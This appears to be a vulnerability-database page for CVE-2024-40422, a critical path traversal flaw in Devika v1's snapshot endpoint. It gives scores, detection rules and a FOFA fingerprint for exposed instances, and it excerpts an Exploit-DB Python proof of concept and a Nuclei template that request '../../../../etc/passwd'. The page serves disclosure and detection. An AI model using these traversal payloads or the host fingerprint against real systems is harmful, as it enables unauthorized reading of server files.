CVE-2024-40422
published 2024-07-24CVE-2024-40422: The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can…
PriorityP271critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
EXPLOIT
EPSS
11.41%
95.5th percentile
The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| stitionai | devika | — | — |
Detection & IOCsextracted from sources · hover to see the quote
yara
Nuclei template: GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd with response body matching regex root:.*:0:0: and Content-Type header application/octet-stream
- →Detect exploitation attempts by monitoring HTTP GET requests to /api/get-browser-snapshot with a snapshot_path parameter containing directory traversal sequences (e.g., ../). ↗
- →Successful exploitation is indicated by a response body matching the regex root:.*:0:0: (Unix /etc/passwd content) and a Content-Type header of application/octet-stream with HTTP 200.
- →Pre-exploitation fingerprinting of Devika instances can be detected by GET /api/data requests whose JSON response body contains the keys models, projects, OPENAI, and OLLAMA.
- →Devika v1 instances exposed on the internet can be discovered via FOFA using the icon hash -1429839495; monitor for scanning activity targeting this fingerprint.
- →The vulnerability requires no authentication (PR:N, UI:N); any unauthenticated GET request to the snapshot endpoint with traversal sequences should be treated as an attack attempt.
- ·The path traversal payload shown targets Linux/Unix systems (/etc/passwd). The exploit was tested on Windows 11, so Windows-specific traversal paths (e.g., ..\..\..\..\windows\win.ini) may also be viable against Windows-hosted instances. ↗
- ·The vulnerability affects specifically Devika v1 (cpe:2.3:a:stitionai:devika:1.0). Versions beyond v1 that patch this issue should not be affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Devika v1 - Path Traversal via 'snapshot_path'
exploitdb·2024-08-04·CVSS 9.1
CVE-2024-40422 [CRITICAL] Devika v1 - Path Traversal via 'snapshot_path'
Devika v1 - Path Traversal via 'snapshot_path'
---
# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422
#!/usr/bin/python
import argparse
import requests
def exploit(target_url):
url = f'http://{target_url}/api/get-browser-snapshot'
params = {
'snapshot_path': '../../../../etc/passwd'
}
response = requests.get(url, params=params)
print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
parser.add_argument('-t', '--target',
Nuclei
Devika v1 - Path Traversal
nuclei·CVSS 9.1
CVE-2024-40422 [CRITICAL] Devika v1 - Path Traversal
Devika v1 - Path Traversal
The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
Template:
id: CVE-2024-40422
info:
name: Devika v1 - Path Traversal
author: s4e-io,alpernae
severity: critical
description: |
The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the
No writeups or analysis indexed.
https://github.com/alpernae/CVE-2024-40422https://github.com/stitionai/devikahttps://github.com/stitionai/devika/pull/619https://medium.com/@alpernae/uncovering-path-traversal-in-devika-v1-a-deep-dive-into-cve-2024-40422-f8ce81398b99https://github.com/alpernae/CVE-2024-40422https://github.com/stitionai/devikahttps://github.com/stitionai/devika/pull/619
2024-07-24
Published